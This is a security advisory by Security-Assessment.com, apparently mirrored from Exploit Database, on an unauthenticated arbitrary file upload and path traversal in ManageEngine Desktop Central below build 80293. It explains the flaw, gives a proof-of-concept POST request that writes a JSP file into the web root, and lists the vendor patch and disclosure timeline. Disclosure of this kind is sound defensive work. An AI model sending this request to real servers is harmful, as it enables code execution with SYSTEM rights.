ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload

• Exploit Database
• 38 阅读

• 作者： Security-Assessment.com
  日期： 2013-11-18
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/29674/

• (, ) (, 
  . `.' ) ('.', 
   ). , ('. ( ) ( 
  (_,) .`), ) _ _, 
   /_____// _\________ _____ 
   \____\==/ /_\\ _/ ___\/_ \ / \ 
   / \/ |\\\__(<_> )Y Y\ 
  /______/\___|__/ \___>____/|__|_|/ 
  \/ \/.-.\/ \/:wq 
  (x.0) 
  '=.|w|.=' 
  _='`"``=. 
  
  presents.. 
  
  DesktopCentral Arbitrary File Upload Vulnerability
  Affected versions: DesktopCentral versions < 80293
  
  PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf
  
  +-----------+ 
  |Description| 
  +-----------+ 
  
  ManageEngine DesktopCentral 8.0.0 build 80293 and below suffer from an arbitrary file upload vulnerability that can be 
  leveraged to gain arbitrary code execution on the server. The code run on the server in this fashion will execute as 
  NT-AUTHORITY\SYSTEM.
  The problem exists in the AgentLogUploadServlet. This servlet takes input from HTTP POST and constructs an output file 
  on the server without performing any sanitisation or even checking if the caller is authenticated. Due to the way the 
  path is constructed it is possible to traverse to the application web root and create a script file that will be 
  executed when called from a web browser.
  
  +------------+ 
  |Exploitation| 
  +------------+ 
  
  POST/agentLogUploader?computerName=DesktopCentral&domainName=webapps&
  customerId=..&filename=test.jsp HTTP/1.1
  Host: <desktopcentral>:8020
  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Connection: keep-alive
  Content-Type: text/html;
  Content-Length: 109
  
  <HTML>
   <HEAD>
  <TITLE>Hello World</TITLE>
   </HEAD>
   <BODY>
  <H1>Hello World</H1>
   </BODY>
  </HTML>
  
  +----------+ 
  | Solution | 
  +----------+ 
  
  Apply the patch supplied by the vendor (Patch 80293)
  
  +-------------------+ 
  |Disclosure Timeline| 
  +-------------------+ 
  
  
  20/10/2013 – Vulnerability discovered, vendor notified.
  25/10/2013 – Vendor acknowledges issue
  30/10/2013 - Vendor issues Patch 80293 that fixes the issue
  09/11/2013 – Exploit demonstrated at Kiwicon 7
  18/11/2013 – Advisory released.
  
  +-----------------------------+ 
  |About Security-Assessment.com| 
  +-----------------------------+ 
  
  Security-Assessment.com is a New Zealand based world 
  leader in web application testing, network security 
  and penetration testing. Security-Assessment.com 
  services organisations across New Zealand, Australia, 
  Asia Pacific, the United States and the United 
  Kingdom. 
  
  Security-Assessment.com is currently looking for skilled penetration 
  testers. If you are interested, please email 'hr at security-assessment.com'